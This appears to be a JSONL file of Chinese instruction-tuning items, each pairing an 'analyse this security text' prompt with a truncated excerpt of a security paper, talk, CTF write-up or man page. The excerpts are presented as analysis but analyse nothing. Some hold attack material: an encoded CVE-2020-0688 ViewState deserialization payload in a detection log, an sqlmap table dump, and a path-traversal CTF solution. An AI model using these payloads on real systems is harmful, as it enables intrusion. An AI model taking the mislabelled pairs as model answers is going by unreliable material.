space2comment.py -D webapphacking -T users --dump Database: webapphacking Table: users [7 entries] +----+--------------+------------+----------------+----------------------------------+ | id | name | user | address | pasword | +----+--------------+------------+----------------+-------------------", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# T1190-CVE-2020-0688漏洞利用检测 ## 来自ATT&CK的描述 使用软件数据或命令来利用面向Internet的计算机系统或程序中的弱点从而导致意外或无法预期的行为系统的弱点可能是错误故障或设计漏洞这些应用程序通常是网站但是可以包括数据库例如SQL标准服务例如SMB 或SSH以及具有Internet可访问开放的任何其他应用程序例如Web服务器和相关服务根据所利用的缺陷这可能包括利用防御防卫 如果应用程序托管在基于云的基础架构上则对其进行利用可能会导致基础实际应用受到损害这可以使攻击者获得访问云API或利用弱身份和访问管理策略的路径 对于网站和数据库OWASP排名前10位和CWE排名前25位突出了最常见的基于Web的漏洞 ## CVE-2020-0688漏洞 Microsoft Exchange Server是微软公司一套支持多种电子邮件网络协议的电子邮件服务组件除传统的电子邮件的存取储存转发作用外在新版本的产品中亦加入了一系列辅助功能如语音邮件邮件过滤筛选和OWA基于Web的电子邮件存取 漏洞起于Microsoft Exchange服务器在安装时并没有正确创建唯一密钥经过身份验证的攻击者可以欺骗目标服务器反序列化恶意创建的ViewState数据使攻击者可以在Exchange Control Panel web应用上执行任意.net代码 ## 测试案例 具体复测可以参考 - CVE-2020-0688Exchange Server使用固定加密密钥远程代码执行漏洞修复通告<https://www.anquanke.com/post/id/199772> - CVE-2020-0688_微软EXCHANGE服务的远程代码执行漏洞复现<https://www.cnblogs.com/pt007/p/12394722.html> ## 检测日志 HTTP流量Windows sysmon日志IIS日志exchange日志 ## 测试复现 可参考上述测试案例 ## 测试留痕 HTTP流量检测规则基于payload关键词进行检测 Windows sysmon日志检测规则基于payload关键词检测 IIS日志检测规则留痕如下 ```yml 2020-03-09 17:16:50 ::1 POST /owa/auth.owa &CorrelationID=<empty>;&cafeReqId=9cff6edd-19a9-43c0-bdd2-a94adef6dd0c; 443 HealthMailbox062c8b451f3a4e21aa98fd88e45f499e@mail163.com ::1 Mozilla/4.0+(compatible;+MSIE+9.0;+Windows+NT+6.1;+MSEXCHMON;+ACTIVEMONITORING;+OWACTP) - 302 0 0 0 2020-03-09 17:16:58 172.*.*.27 GET /ecp/default.aspx __VIEWSTATEGENERATOR=B97B4E27&__VIEWSTATE=%2FwEyhAYAAQAAAP%2F%2F%2F%2F8BAAAAAAAAAAwCAAAAXk1pY3Jvc29mdC5Qb3dlclNoZWxsLkVkaXRvciwgVmVyc2lvbj0zLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPTMxYmYzODU2YWQzNjRlMzUFAQAAAEJNaWNyb3NvZnQuVmlzdWFsU3R1ZGlvLlRleHQuRm9ybWF0dGluZy5UZXh0Rm9ybWF0dGluZ1J1blByb3BlcnRpZXMBAAAAD0ZvcmVncm91bmRCcnVzaAECAAAABgMAAACmBDxSZXNvdXJjZURpY3Rpb25hcnkNCiAgeG1sbnM9Imh0dHA6Ly9zY2hlbWFzLm1pY3Jvc29mdC5jb20vd2luZngvMjAwNi94YW1sL3ByZXNlbnRhdGlvbiINCiAgeG1sbnM6eD0iaHR0cDovL3NjaGVtYXMubWljcm9zb2Z0LmNvbS93aW5meC8yMDA2L3hhbWwiDQogIHhtbG5zOlN5c3RlbT0iY2xyLW5hbWVzcGFjZTpTeXN0ZW07YXNzZW1ibHk9bXNjb3JsaWIiDQogIHhtbG5zOkRpYWc9ImNsci1uYW1lc3BhY2U6U3lzdGVtLkRpYWdub3N0aWNzO2Fzc2VtYmx5PXN5c3RlbSI%2BDQoJIDxPYmplY3", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n.\\\" You can view this file with: .\\\" nroff -man [filename] .\\\" .TH svndumpfilter 1 .SH NAME svndumpfilter \\- 过滤一个 Subversion 仓库的转储文件 `dumpfile' .SH \"SYNOPSIS 总览\" .TP \\fBsvndumpfilter\\fP \\fIcommand\\fP [\\fIoptions\\fP & \\fIargs\\fP] .SH \"OVERVIEW 概述\" Subversion 是一个版本控制系统允许保存旧版本的文件和目录 (通常是源代码) 保存一个记录何人何时为何作出修改等等信息的日志与 CVSRCS 或者 SCCS 工具类似\\fBSubversion\\fP 保存着主控源文件的单一拷贝这份拷贝被称 为代码 ``仓库'' (``repository'')它包含所有的信息从而可以从中获取这些文 件在先前任何时间的版本 要获得有关 Subversion 项目的更多信息请访问 http://subversion.tigris.org Subversion 及其工具的文档包括对 \\fBsvn\\fP\\fBsvnadmin\\fP \\fBsvnserve\\fP 和 \\fBsnvlook\\fP 程序详细的使用说明和解释历史背景哲学 探讨和追求等等可以从http://svnbook.red-bean.com/ 找到 运行 `svndumpfilter help' 来阅读内建的工具文档", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nThe Minimum Elements For a Software Bill of Materials (SBOM) Pursuant to Executive Order 14028 on Improving the Nations Cybersecurity The United States Department of Commerce July 12, 2021 Department of Commerce The Minimum Elements for an SBOM 2 Table of Contents Table of Contents ............................................................................................................................ 2 I. Executive Summary ............................................................................................................. 3 II. Background .......................................................................................................................... 5 The Case for Transparency ......................................................................................................... 5 III. Scope .................................................................................................................................... 6 IV. Minimum Elements .............................................................................................................. 8 Data Fields .................................................................................................................................. 8 Automation Support .................................................................................................................. 10 Practices and Processes ............................................................................................................. 11 V. Beyond Minimum Elements: Enabling Broader SBOM Use Cases .................................. 13 Recommended Data Fields ....................................................................................................... 14 Cloud-based Software and Software-as-a-Service.................................................................... 15 SBOM Integrity and Authenticity ............................................................................................. 16 Vulnerab", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Federation Workflow System (crypto, 40 solved, 119p) ``` The source code for the Federation Workflow System has been leaked online this night. Our goal is to inspect it and gain access to their Top Secret documents. nc crypto-04.v7frkwrfyhsjtbpfcppnu.ctfz.one 7331 ``` In the task we get [client](client.py) and [server](server.py) sources. Using the client we can connect to the server and: - list files on the server - get AES-ECB encrypted file contents - login as admin and receive the flag, if we can provide a proper one-time-password Once we examine the server code we can see that file list is hardcoded, so not very useful. We can also see that what we get is not exactly encrypted file contents but in fact: ```python content = self.read_file(file) response = '{0}: {1}'.format(file, content) encrypted_response = self.encrypt(response) ``` So file contents, but prefixed by filename we provide! File names are `sanitized` but in a strange way: ```python def sanitize(self, file): try: if file.find('\\x00') == -1: file_name = file else: file_name = file[:file.find('\\x00')] file_path = os.path.realpath('files/{0}'.format(file_name)) if file_path.startswith(os.getcwd()): return file_path else: return None ``` This simply removes anything after first nullbyte from the filename. So if we request files `XXX\\0` and `XXX\\0\\0\\0` we would get identical result. We can also see that we could in fact request any file from CWD by sending `../somefilename`and jumping out of `files` directory. If we look at config files the server uses we can see: ``` self.log_path = '../top_secret/server.log' self.real_flag = '../top_secret/real.flag' self.aes_key = '../top_secret/aes.key' self.totp_key = 'totp.secret' ``` So the flag, aes key and logs are out of our reach, but `totp.secret` file is not! We could request this file from the server. Now let's examine the `admin` command. It's pretty straightforward - it checks the OTP and if it matches we get the flag. OTP seems solid: ``` def totp(sel", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nHacking Driverless Vehicles Zoz Origins Germany 1986 Ernst Dickmanns, VaMoRs 1995: Munich to Copenhagen in regular traffc, up to 175kph, vision only! Asia  Singapore: Autonomous bus services scheduled by 2022  Shanghai: Autonomous bus testing  Guangzhou: Public road testing since 2018  Beijing: Baidu testing on 105km of suburban roads  Baidu-Volvo partnership: Level 4 autonomy taxis by 2021  Advantages:  Energy effciency  Time effciency  New applications The Revolution Is Coming Civil Applications Transportation Filmmaking Oceanography Mapping Logistics Powerline Inspection Civil Applications  Unmanned cargo shipping  75% of maritime accidents caused by human error  Major technical challenge: dealing with hardware failure on long voyages Civil Applications  Kongsberg Yara Birkeland  Zero emissions, autonomous capable  Replaces 40,000 annual truck trips  2020: Manned operation & testing  2021: Downcrewing  2022: Fully autonomous operation Civil Applications  Priorities:  Precision Agriculture  Self-Driving Cars  Roadblocks:  Shared Infrastructure (Airspace, Roads)  Acceptance (Safety, Robustness)  Lets Talk Failure! Classic Failures Sandstorm DARPA Grand Challenge 2004  Deciding what the robot knows is a constant battle  Correct state estimation is key to decision making  Successful exploits will most likely subvert state estimation Classic Failures Fatal Tesla Autopilot Accident US-101, March 2018  Dynamic cruise control + autosteer lane following  120 kph impact with previously damaged crash attenuator  Vehicle selected poor lane markings over lead vehicle  Fragile decision making & edge cases abound Autonomous Vehicle Logic Structures Activity Hierarchy Control Loops, Stability Maintenance Collision Avoidance Navigation & Localization Mission Task Planners/Reasoners  Attacks lower in the stack defeat everything above  More engineering effort spent on guaranteed robustness at lower levels  Lower layers may be juicier but harder targets Autonomous Vehicle Logic Stru", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nForward-Looking Statement Disclaimer This presentation may contain forward-looking statements under applicable securities laws. All statements other than statements of historical fact are forward-looking statements. Forward-looking statements are based on information available to Jamf at the time they are made and provide Jamfs current expectations and projections about our financial condition, results, plans, objectives, future performance and business. You can identify forward-looking statements by the fact that they do not relate strictly to historical or current facts. Forward-looking statements may include words such as \"anticipate,\" \"estimate,\" \"expect,\" \"project,\" \"plan,\" \"intend,\" \"believe, \"may,\" \"will,\" \"should,\" \"can have,\" \"likely\" and other terms of similar meaning in connection with any discussion of the timing or nature of future operating or financial performance or other events. All statements we make about our estimated and projected costs, expenses, cash flows, growth rates and financial results are forward- looking statements. In addition, our plans and objectives for future operations, growth initiatives, product plans and product strategies are forward-looking statements. There are various factors, risks and uncertainties that may cause Jamfs actual results to differ materially from those that we expected in any forward-looking statements. These factors and risks are set forth in the documents Jamf files with the U.S. Securities and Exchange Commission (SEC). These documents are publicly available on the SECs website. Forward-looking statements are not guarantees of future performance and you should not place undue reliance on them. Jamf is under no obligation to update any forward-looking statements made in this presentation. macOS Detections at Jamf Threat Labs Introduced 10.15 Replacement for:  Kauth KPI  Mac kernel framework  OpenBSM audit trail Kernel extensions difficult to develop and maintain New security issues created as even minor bugs ofte", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n802.11 Massive Monitoring Andrés Blanco - Andrés Gazzoli Outline  Introduction  Approaches  The USB Dilemma  Distributed System  WiWo  Questions Introduction [ Who is this talk for? ] Introduction [ Who is this talk for? ] Introduction [ Who is this talk for? ] Introduction [ Who is this talk for? ] Introduction [ Who is this talk for? ] Introduction [ goals ]  Monitor  Channel hopping traffic (such as WiFi-Direct)  Access Points with auto channel selection  Multiple Access Points on different channels  Stations  Multiple locations at the same time  Inject frames on multiple channels Introduction [ 802.11 channels ] Channel Frequency 1 2412 2 2417 3 2422 4 2427 5 2432 6 2437 7 2442 8 2447 9 2452 10 2457 11 2462 12 2467 13 2472 14 2484 Channel Frequency 131 3657.5 132 3660.0 - 3662.5 133 3665.0 - 3667.5 134 3670.0 - 3672.5 135 3675.0 - 3677.5 136 3680.0 - 3682.5 137 3685.0 - 3687.5 138 3690.0 - 3692.5 2.4 GHz (802.11b/g/n) 3.6 GHz (802.11y) Channel Frequency 36 5180 40 5200 44 5220 48 5240 52 5260 56 5280 60 5300 64 5320 100 5500 104 5520 108 5540 112 5560 Channel Frequency 116 5580 120 5600 124 5620 128 5640 132 5660 136 5680 140 5700 149 5745 153 5765 157 5785 161 5805 165 5825 5 GHz (802.11a/h/j/n/ac) Approaches [ first approach ] Approaches [ second approach ] Approaches [ wireshark ] Wireless Interface DHCP DNS HTTP Probe Request Wireless Interface DHCP DNS HTTP Probe Request Approaches [ station profiler ]  Profiler Demo [ second approach ] Wireless Network Traffic could be displayed during the demo. Please disable Wi-Fi if you dont want to be part of it. The USB Dilemma [ scalability ] The USB Dilemma [ scalability ] The USB Dilemma [ bus saturation ] Demo [ bus saturation ] Wireless Network Traffic could be displayed during the demo. Please disable Wi-Fi if you dont want to be part of it. Wireless Interface USB Bus Filter Kernel User Space The USB Dilemma [ bus saturation ] Firmware The USB Dilemma [ bus saturation ] The USB Dilemma [ bus saturation ] The USB", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nStarting the Avalanche: Application DoS In Microservice Architectures Scott Behrens Jeremy Heffner Jeremy Heffner  Senior Security Software Engineer  Developing and securing things for 20+ years Introductions Scott Behrens  Netflix senior application security engineer  Breaking and building for 8+ years  Contributor to a variety of open source projects (github.com/sbehrens) DoS focused on application layer logic Photo of a battering ram by Flickr user Patrick Denker; License: https://creativecommons.org/licenses/by/2.0/ http://www.interestingfacts.org/fact/first-example-of-biological-warfare How Novel is Application DoS? https://www.akamai.com/us/en/multimedia/documents/state-of-the-internet/q1-2017-state-of-the-internet-security-report.pdf Microservice Primer: High Level View Architecture Client Libraries and API Gateway Circuit Breakers / Failover Cache Microservice Primer: Architecture Scale Service independence Fault isolation Eliminates stack debt Distributed system complexity Deployment complexity Cascading service failures if things arent set up right GOOD BAD Simplified Microservice API Architecture INTERNET ZUUL PROXY ZUUL PROXY PROXIES CORE API WEBSITE Middle Tier Service Middle Tier Service Middle Tier Service Middle Tier Service Backend Tier Service Backend Tier Service Backend Tier Service Backend Tier Service Backend Tier Service Backend Tier Service Backend Tier Service Backend Tier Service EDGE Middle Backend Microservice Primer: API Gateways and Client Libraries Interface for middle tier services Services provide client libraries to API Gateway Diagrams provided by microservices.io Microservice Primer: Circuit Breaker Helps with handling service failures How do you know what timeout to choose? How long should the breaker be triggered? Diagrams provided by microservices.io Microservice Primer: Cache Speeds up response time Reduces load on services fronted by cache Reduces the number of servers needed to handle requests https://github.com/netflix/evca", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n臺灣資安人才教育 Cybersecurity Education in Taiwan 吳宗成 臺灣科技大學資訊管理系特聘教授 教育部資訊安全人才培育計畫主持人 tcwu@cs.ntust.edu.tw 2017/08/25 HITCON CMT 1 開宗明義 教育與人才學 2 教育情境 在學教育 In-campus 社群教育 Community 在職教育 On-job 3 教育本質 4 人手 What you know 人才 Why you have 人物 Who you are 教育目標 5 人手 人才 人 物 人手 人才 人 物 何謂人才學  Talent studies or Talent resourcesMBA智庫 百科2015/03/07  綜合自然科學及社會科學的一門新興學科  探討人才開發培訓管理使用的基本理論  探討人才成長規劃或制度以更好地發現培 養推薦及使用人才 6 諸葛亮的人才學  間之以是非而觀其志  窮之以辭辯而觀其變  咨之以計謀而觀其識  告之以禍難而觀其勇  醉之以酒而觀其性  臨之以利而觀其廉  期之以事而觀其信 7 人才培育的分類與分級  人才分類  理論與工程技術  跨域應用與管理  人才分級  別人說什麼自己跟著做什麼人手C級  自己做什麼別人跟著做什麼人才B級  自己做什麼自己跟著想什麼人才B+級  自己想什麼別人跟著想什麼人物A級 8 人才學的開發與實踐  以國家的角度來看人才學  國家人才政策與規劃long-term  社會或產業需求與供給short-term or mission-oriented  自主式社群society or community  以教育的角度來看人才學  基礎通用的人才養成in-campus study  進階專業的人才養成advanced program on-job  以企業的角度來看人才學  培訓人才on-job training  挖掘人才headhunt or poach  留住人才keep and retain 9 資安人才素養 10 資安領域的基礎能量  基礎學科具電資資管數學等背景  計量數學線性代數離散數學統計學  程式語言程式設計  資料結構演算法  作業系統計算機結構  網路系統資料庫系統    適性發展人盡其才 11 資安領域的進階能量  理論創新能力  密碼學加解密數位簽章雜湊函數破密分析  大數據分析人工智慧機器學習  工程研發能力  系統安全軟體硬體網路安全資料庫安全  雲端計算行動運用數位鑑識  應用及管理能力  關鍵基礎設施通訊水電交通醫療  電子商務金融支付  電子治理隱私保護智財保護 12 資安人才的產業需求  各行各業  技術研發  資安產品或關鍵技術  學界法人及業界研發機構  政府及企業應用  政府機構電子化政府網路犯罪偵防國安與國防  電信業電商業通信系統電子商務  金融業網路銀行線上支付隱私保護  高科技製造業電子設備IC設計智財保護  遊戲平台系統整合服務雲端服務數位鑑識  會計師事務所國際證照資安稽核 13 從國際級CTF看到的臺灣之光 HITCON217 14 2014&2015 DEFCON CTF Top 5  2014排名 1. PPP 美國 2. HITCON 臺灣 3. Dragon Sector 波蘭 4. Reckless Abandon ?? 5. Blue-Lotus 中國  2015排名 1. DEFKOR 韓國 2. PPP 美國 3. 0daysober 法國+瑞士 4. HITCON 臺灣 5. Blue-Lotus 中國 15 註各項歷年CTF排名請參考 https: //ctftime.org 2016&2017 DEFCON CTF Top 5  2016排名 1. PPP 美國 2. b1o0p 中國 3. DEFKOR 韓國 4. HITCON 臺灣 5. KaisHack 韓國  2017排名 1. PPP 美國 2. HITCON 臺灣 3. A*0*E 中國 4. DEFKOR 韓國 5. Tea Deliverers 中國 16 註各項歷年CTF排名請參考 https: //ctftime.org CTF teams ranking (11th Aug. 2017) Rank Team CTF rating 1 PPP (美國) 701.259 2 217 (臺灣) 570.149 3 LCBC (俄羅斯) 469.205 4 Bushwhackers (俄羅斯) 435.993 5 Dragon Sector (波蘭) 428.095 6 Shellphish (美國) 426.139 7 Binja (日本) 345.130 16 HITCON (臺灣)", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nlsof === 显示Linux系统当前已打开的所有文件列表 `lsof -p pid` ## 补充说明 **lsof命令** 用于查看你进程打开的文件打开文件的进程进程打开的端口(TCPUDP)找回/恢复删除的文件是十分方便的系统监视工具因为lsof命令需要访问核心内存和各种文件所以需要root用户执行 在linux环境下任何事物都以文件的形式存在通过文件不仅仅可以访问常规数据还可以访问网络连接和硬件所以如传输控制协议 (TCP) 和用户数据报协议 (UDP) 套接字等系统在后台都为该应用程序分配了一个文件描述符无论这个文件的本质如何该文件描述符为应用程序与基础操作系统之间的交互提供了通用接口因为应用程序打开文件的描述符列表提供了大量关于这个应用程序本身的信息因此通过lsof工具能够查看这个列表对系统监测以及排错将是很有帮助的 ### 语法 ```shell lsof (选项) ``` ### 选项 ```shell -a列出打开文件存在的进程 -c<进程名>列出指定进程所打开的文件 -g列出GID号进程详情 -d<文件号>列出占用该文件号的进程 +d<目录>列出目录下被打开的文件 +D<目录>递归列出目录下被打开的文件 -n<目录>列出使用NFS的文件 -i<条件>列出符合条件的进程协议:端口 @ip  -p<进程号>列出指定进程号所打开的文件 -u列出UID号进程详情 -h显示帮助信息 -v显示版本信息 ``` ### 实例 ```shell lsof command PID USER FD type DEVICE SIZE NODE NAME init 1 root cwd DIR 8,2 4096 2 / init 1 root rtd DIR 8,2 4096 2 / init 1 root txt REG 8,2 43496 6121706 /sbin/init init 1 root mem REG 8,2 143600 7823908 /lib64/ld-2.5.so init 1 root mem REG 8,2 1722304 7823915 /lib64/libc-2.5.so init 1 root mem REG 8,2 23360 7823919 /lib64/libdl-2.5.so init 1 root mem REG 8,2 95464 7824116 /lib64/libselinux.so.1 init 1 root mem REG 8,2 247496 7823947 /lib64/libsepol.so.1 init 1 root 10u FIFO 0,17 1233 /dev/initctl migration 2 root cwd DIR 8,2 4096 2 / migration 2 root rtd DIR 8,2 4096 2 / migration 2 root txt unknown /proc/2/exe ksoftirqd 3 root cwd DIR 8,2 4096 2 / ksoftirqd 3 root rtd DIR 8,2 4096 2 / ksoftirqd 3 root txt unknown /proc/3/exe migration 4 root cwd DIR 8,2 4096 2 / migration 4 root rtd DIR 8,2 4096 2 / migration 4 root txt unknown /proc/4/exe ksoftirqd 5 root cwd DIR 8,2 4096 2 / ksoftirqd 5 root rtd DIR 8,2 4096 2 / ksoftirqd 5 root txt unknown /proc/5/exe events/0 6 root cwd DIR 8,2 4096 2 / events/0 6 root rtd DIR 8,2 4096 2 / events/0 6 root txt unknown /proc/6/exe events/1 7 root cwd DIR 8,2 4096 2 / ``` **lsof输出各列信息的意义如下** 标识 | 说明 :- | :- `COMMAND` | 进程的名称 `PID` | 进程标识符 `PPID` | 父进程标识符需要指定-R参数 `USER` | 进程所有者 `PGID` | 进程所属组 `FD` | 文件描述符应用程序通过它识别该文件 文件描述符列表 标识 | 说明 :- | :- `cwd` | 表示当前工作目录即应用程序的当前工作目录这是该应用程序启动的目录除非它本身对这个目录进行更改 `txt` | 该类型", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n### 下载内核方式 我们可以从 `https://www.kernel.org` 下载想要的内核根据 https://www.kernel.org/category/releases.html我们可以知道内核主要有以下几种类别 - Prepatch - Mainline - Stable - Longterm 这里我们选择长期支持版 下面为了方便介绍我们使用 `5.4` 版本内核开发者会一直支持这个版本到 2025 年 12 月份进一步地我们选择 5.4 的最新版本 5.4.982021 年 2 月记录为了加速我们可以选择就近的源来下载内核这里使用清华源https://mirrors.tuna.tsinghua.edu.cn/kernel/ ```bash  curl -O -L https://mirrors.tuna.tsinghua.edu.cn/kernel/v5.x/linux-5.4.98.tar.xz % Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 100 104M 100 104M 0 0 35.5M 0 0:00:02 0:00:02 --:--:-- 35.5M  unxz linux-5.4.98.tar.xz ``` ### 验证内核签名方式 为了防止内核被恶意修改在发布内核时发布者会对内核进行签名这里我们也对内核的签名进行校验 ```bash  curl -O -L https://mirrors.tuna.tsinghua.edu.cn/kernel/v5.x/linux-5.4.98.tar.sign % Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 100 989 100 989 0 0 5525 0 --:--:-- --:--:-- --:--:-- 5525  gpg --verify linux-5.4.98.tar.sign gpg: assuming signed data in 'linux-5.4.98.tar' gpg: Signature made 2021年02月13日 星期六 20时54分47秒 CST gpg: using RSA key 647F28654894E3BD457199BE38DBBDC86092693E gpg: Can't check signature: No public key ``` 可以看到我们遇到了 `Can't check signature: No public key` 的问题这主要是因为我们没有相应的公钥来验证签名此时我们可以下载相应内核版本发布者的公钥 ```bash  gpg --locate-keys torvalds@kernel.org gregkh@kernel.org gpg: WARNING: unacceptable HTTP redirect from server was cleaned up gpg: key 38DBBDC86092693E: public key \"Greg Kroah-Hartman <gregkh@kernel.org>\" imported gpg: Total number processed: 1 gpg: imported: 1 gpg: WARNING: unacceptable HTTP redirect from server was cleaned up gpg: key 79BE3E4300411886: public key \"Linus Torvalds <torvalds@kernel.org>\" imported gpg: Total number processed: 1 gpg: imported: 1 pub rsa4096 2011-09-23 [SC] 647F28654894E3BD457199BE38DBBDC86092693E uid [ unknown] Greg Kroah-Hartman <gregkh@kernel.org> sub rsa4096 2011-09-23 [E] pub rsa2048 2011-09-20 [SC] ABAF11C65A2970B130ABE3C479BE3E4300411886 uid [ unknown] Linus Torvalds <torvalds@kernel.org> sub rsa2048 ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nLinks to Police Procedure Cases & Essays When Can the Police Make a Stop? Probable Cause Brinegar v. US (1949) http://vlex.com/vid/20016296 case Maryland v. Pringle (2003) http://www.oyez.org/cases/2000-2009/2003/2003_02_809/ case Reasonable Suspicion Alabama v. White (1990) http://supreme.justia.com/us/496/325/ case http://www.megaessays.com/viewpaper/92482.html essay The Totality of the Circumstances US v. Arvizu (2002) http://caselaw.lp.findlaw.com/scripts/getcase.pl?court=us&vol=000&invol=00-1519 case Frisks and Patdowns by Police Officers Terry v. Ohio (1968) Rules governing frisks http://www.soc.umn.edu/~samaha/cases/terry%20v%20ohio.html case http://mo.essortment.com/terryohiostop_rorf.htm essay When Must the Police Inform you of Your Rights? Miranda v. Arizona (1966) What rights must be given? http://caselaw.lp.findlaw.com/scripts/getcase.pl?court=US&vol=384&invol=436 case Berkemer v. McCarty (1984) http://caselaw.duicenter.com/berkemer01.html case Searches What is a search? Katz v. US (1967) 4th Amend. Protects privacy http://caselaw.lp.findlaw.com/scripts/getcase.pl?court=US&vol=389&invol=347 case http://www.uscourts.gov/outreach/resources/katz/index.html essay Search incident to an Arrest. (Search of general area around suspect allowed) New York v. Belton (1981) http://www.oyez.org/cases/1980-1989/1980/1980_80_328/ case Motor Vehicle Searches Carroll v. US (1925) No search warrant required http://vlex.com/vid/20024460 case New York v. Belton (1981) Warrant less search of passenger compartment allowed after arrest. http://www.oyez.org/cases/1980-1989/1980/1980_80_328/ case http://www.jus.state.nc.us/NCJA/legjul94.htm essay US v. Ross (1982) Every part of car can be searched that might contain the contraband http://www.oyez.org/cases/1980-1989/1981/1981_80_2209/ case When can the police Kick your door in without Knocking First? Wilson v. Arkansas (1995) Knock and Announce Required unless exception http://www.oyez.org/cases/1990-1999/1994/1994_94_5707/ case ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n#CURL# ---- ##GENERAL## ``` curl http://curl.haxx.se curl http://site.{one,two,three}.com curl ftp://ftp.numericals.com/file[1-100].txt curl ftp://ftp.numericals.com/file[001-100].txt curl ftp://ftp.letters.com/file[a-z].txt curl http://any.org/archive[1996-1999]/vol[1-4]/part{a,b,c}.html curl http://www.numericals.com/file[1-100:10].txt curl http://www.letters.com/file[a-z:2].txt curl -o index.html http://curl.haxx.se/ curl http://curl.haxx.se/ > index.html curl -# http://curl.haxx.se/ > index.html curl -0 http://curl.haxx.se/ curl --http1.1 http://curl.haxx.se/ curl --http2 http://curl.haxx.se/ curl -1 http://curl.haxx.se/ curl --tlsv1 http://curl.haxx.se/ curl -2 http://curl.haxx.se/ curl --sslv2 http://curl.haxx.se/ curl -3 http://curl.haxx.se/ curl --sslv3 http://curl.haxx.se/ curl -4 http://curl.haxx.se/ curl --ipv4 http://curl.haxx.se/ curl -6 http://curl.haxx.se/ curl --ipv6 http://curl.haxx.se/ curl -A \"wget/1.0\" http://curl.haxx.se/ curl --user-agent \"Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)\" [URL] curl --user-agent \"Mozilla/4.73 [en] (X11; U; Linux 2.2.15 i686)\" [URL] curl -b \"phpsession=Testtest\" http://demo.com/ curl --cookie \"name=Daniel\" http://curl.haxx.se curl -c cookies.txt http://curl.haxx.se/ curl --cookie-jar cookies.txt http://curl.haxx.se curl -d \"username=admin&password=pass\" http://curl.haxx.se/ curl --data \"birthyear=1905&press=%20OK%20\" http://curl.haxx.se/when.cgi curl --data-urlencode \"name=I am Daniel\" http://curl.haxx.se curl --data \"<xml>\" --header \"Content-Type: text/xml\" --request PROPFIND url.com curl -e \"http://referer\" http://demo.com/ curl --referer http://curl.haxx.see http://curl.haxx.se curl --header \"Host:\" http://curl.haxx.se curl --header \"Destination: http://nowhere\" http://curl.haxx.se curl -D - http://curl.haxx.se/ curl --dump-header headers_and_cookies http://curl.haxx.se curl -L http://github.com/ curl --location http://curl.haxx.se curl --dns-servers 8.8.8.8 http://demo.com/ curl --trace-ascii debugdump.tx", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n<div dir=\"rtl\"> <h1>חידת אמ\"ן - פסח התשפ\"ב</h1> <p> לרגל חג הפסח פרסם אגף המודיעין חידה קצרה. נראה כאן את הפתרון שלה. על החידה עבדתי יחד עם zVaz וקבוצה נוספת של גולשים בטלגרם. החידה קצת מפוזרת, תחזיקו חזק. </p> <h2>תיאור</h2> <p> אחרי שבשנה שעברה יותר מ-200,000 אנשים נענו לאתגר - באגף המודיעין מפרסמים את החידה השנתית החדשה שלהם, רק שהפעם - מדובר בריבוע שחור לגמרי. הוא יוביל אתכם לשלוש תחנות אוטובוס ברחבי הארץ ולכתובת מייל אחת. שיהיה בהצלחה - אתם תזדקקו לזה. מערכת אתר צה\"ל | 14.04.22 </p> ![](images/shemot11071947.jpg) <p> קישור להורדת התמונות באיכות המלאה: <a href=\"https://www.idf.il/media/il2jhotv/letmypeoplego.png?optimize=false\">התמונה השחורה</a>, <a href=\"https://www.idf.il/media/t45dusgz/letmypeoplego.png\">התמונה בכותרת</a>. </p> <pre dir=\"ltr\" style=\"text-align: left\"> www.idf.il/_____/ </pre> <p> *את החידה חיבר מדור טכנולוגיות למידה במערך ההדרכה למודיעין ולסייבר של אמ\"ן. המדור אחראי על הפיכת ההכשרות של האגף לדיגיטליות ומתקדמות תוך שילוב לומדות, משחקי למידה וסימולטורים אשר תפקידם להטמיע את הידע בצורה טובה וחוויתית יותר. </p> <h2>פתרון</h2> <h3>התמונה בכותרת</h3> <p> לפני שאנחנו צוללים אל התמונה השחורה והתחנות השונות, יש לנו המון נתונים בתמונה שבכותרת. נעבור על הכל בזריזות. </p> ![](images/letmypeoplego-small.png) <ul> <li>לאורך הגבול הימני של התמונה, הכיתוב \"1956\"</li> <li>מימין, תמונה של משה דיין, ומסביבה פסוק אודות שאול המלך מתוך התנ\"ך</li> <li>קטע בינארי מודגש בירוק בתוך התמונה של משה דיין: 00110010 00111001 00110001 00110000 00110001 00111001 00110101 00110110, מתורגם ל-29101956, כלומר, 29-10-1956, תאריך הפתיחה של מבצע קדש. משה דיין היה רמטכ\"ל מבצע קדש.</li> <li>תמונה של אופירה נבון, אשתו של הנשיא החמישי יצחק נבון. מסביב לתמונה שמות של נשיאי ישראל, ויצחק נבון מודגש</li> <li>תמונה של אוניית המעפילים \"אקסודוס\"</li> <li>הסמל של חיל המודיעין, מוקף ברצף הבינארי 01101100 01100101 01110100 00100000 01101101 01111001 00100000 01110000 01100101 01101111 01110000 